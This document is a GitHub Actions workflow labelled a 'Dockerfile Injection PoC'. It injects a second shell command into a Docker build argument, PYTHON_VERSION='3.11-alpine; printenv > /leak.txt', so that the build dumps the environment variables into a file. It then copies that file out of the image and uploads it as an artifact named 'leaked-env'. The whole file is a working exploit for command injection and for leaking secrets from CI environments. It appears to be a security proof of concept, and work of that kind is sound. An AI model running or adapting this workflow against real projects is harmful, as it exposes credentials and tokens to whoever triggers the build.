name: Dockerfile Injection PoC

on: [push]

jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Build with injected PYTHON_VERSION
        run: |
          docker build \
            --build-arg PYTHON_VERSION='3.11-alpine; printenv > /leak.txt' \
            -t leaktest \
            -f taskcluster/docker/python/Dockerfile .

      - name: Extract /leak.txt
        run: |
          docker create --name temp leaktest
          docker cp temp:/leak.txt leak.txt
          docker rm temp

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env
          path: leak.txt
